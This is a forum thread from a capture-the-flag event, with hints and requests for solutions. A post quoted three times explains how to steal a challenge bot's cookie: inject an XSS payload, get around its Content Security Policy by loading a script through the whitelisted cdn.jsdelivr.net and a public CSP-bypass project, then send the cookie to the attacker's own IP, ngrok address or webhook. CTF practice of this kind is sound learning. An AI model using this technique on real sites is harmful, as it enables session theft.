Great!

(October 26, 2022, 10:55 PM)lnf02 Wrote: Alright, bypassed all the fricking securities on the web...

You can inject an XSS payload on the "bot", a simple <script>alert(1)</script>  would work, but you have a lot of restrictions (CORS and CSP). But, there's a "whitelisted domain" that is cdn.jsdelivr.net...

If you know a little of NPM and so on, you will find this page useful, because you can use the endpoint to redirect to files hostel on Github, Wordpress, and the cdn itself...

You can host a xss.js file on your GH repository, and add something like alert(1), you will finally trigger the alert, but you need to cookie...

Digging deep enough, you will finally find this repository: https://github.com/CanardMandarin/csp-bypass. It's a simple project that allows the bypass of csp and (most important thing) "unsafe-eval", using a JS interpreter.


If you now create an script tag that point to that repository, you can now execute a "query" to your IP, ngrok IP, webhook, whatever...

Finally, you will get something like this:




You can concatenate whatever you want, maybe the cookie (the flag is there...)... (if you read until this part you will find a way to export the cookie, not so hard. The hard part I've already gave it to you ;) )

Cheers, don't be an script kiddie or a leecher :D

cool

bruh this cookie is not exporting LUL

(October 26, 2022, 10:55 PM)lnf02 Wrote: Alright, bypassed all the fricking securities on the web...

You can inject an XSS payload on the "bot", a simple <script>alert(1)</script>  would work, but you have a lot of restrictions (CORS and CSP). But, there's a "whitelisted domain" that is cdn.jsdelivr.net...

If you know a little of NPM and so on, you will find this page useful, because you can use the endpoint to redirect to files hostel on Github, Wordpress, and the cdn itself...

You can host a xss.js file on your GH repository, and add something like alert(1), you will finally trigger the alert, but you need to cookie...

Digging deep enough, you will finally find this repository: https://github.com/CanardMandarin/csp-bypass. It's a simple project that allows the bypass of csp and (most important thing) "unsafe-eval", using a JS interpreter.


If you now create an script tag that point to that repository, you can now execute a "query" to your IP, ngrok IP, webhook, whatever...

Finally, you will get something like this:




You can concatenate whatever you want, maybe the cookie (the flag is there...)... (if you read until this part you will find a way to export the cookie, not so hard. The hard part I've already gave it to you ;) )

Cheers, don't be an script kiddie or a leecher :D

thx, good info.

(October 26, 2022, 01:05 PM)Hacker2222 Wrote: plz discuss here

nice

(October 26, 2022, 10:55 PM)lnf02 Wrote: Alright, bypassed all the fricking securities on the web...

You can inject an XSS payload on the "bot", a simple <script>alert(1)</script>  would work, but you have a lot of restrictions (CORS and CSP). But, there's a "whitelisted domain" that is cdn.jsdelivr.net...

If you know a little of NPM and so on, you will find this page useful, because you can use the endpoint to redirect to files hostel on Github, Wordpress, and the cdn itself...

You can host a xss.js file on your GH repository, and add something like alert(1), you will finally trigger the alert, but you need to cookie...

Digging deep enough, you will finally find this repository: https://github.com/CanardMandarin/csp-bypass. It's a simple project that allows the bypass of csp and (most important thing) "unsafe-eval", using a JS interpreter.


If you now create an script tag that point to that repository, you can now execute a "query" to your IP, ngrok IP, webhook, whatever...

Finally, you will get something like this:




You can concatenate whatever you want, maybe the cookie (the flag is there...)... (if you read until this part you will find a way to export the cookie, not so hard. The hard part I've already gave it to you ;) )

Cheers, don't be an script kiddie or a leecher :D

thanks

thanks

any leads for crypto day 5?

(October 27, 2022, 08:32 AM)vash12 Wrote: any leads for crypto day 5?

I need 2 web and  2 Pwn T_T

Here is the solution to the crypto:



Also, i would appreciate if someone shared the solutions for pwn 4 and 5.